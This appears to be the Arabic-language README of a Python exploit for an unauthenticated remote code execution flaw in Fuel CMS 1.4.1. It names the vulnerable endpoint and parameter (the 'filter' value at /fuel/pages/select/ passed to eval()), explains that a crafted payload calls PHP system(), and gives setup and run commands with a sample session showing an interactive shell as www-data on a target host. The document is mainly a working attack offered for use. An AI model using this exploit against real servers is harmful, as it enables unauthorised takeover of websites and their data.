
ثغرة RCE غير مصادق عليها في Fuel CMS 1.4.1.
ثغرة تنفيذ تعليمات برمجية عن بعد بدون مصادقة في Fuel CMS 1.4.1. يتم تمرير المعامل
filterفي نقطة النهاية/fuel/pages/select/دون تنقية إلى استدعاءeval()في واجهة PHP الخلفية، مما يسمح بتنفيذ تعليمات برمجية عشوائية عبر حمولة مصممة. على عكس الحقن الأعمى، يتم عكس المخرجات مباشرة في استجابة HTTP، لذا ليست هناك حاجة لملف وسيط.
/fuel/pages/select/ مع حمولة filter مصممة خصيصًا تستدعي system() الخاصة بـ PHP مع الأمر المطلوب.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -t http://TARGET
مثال:
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit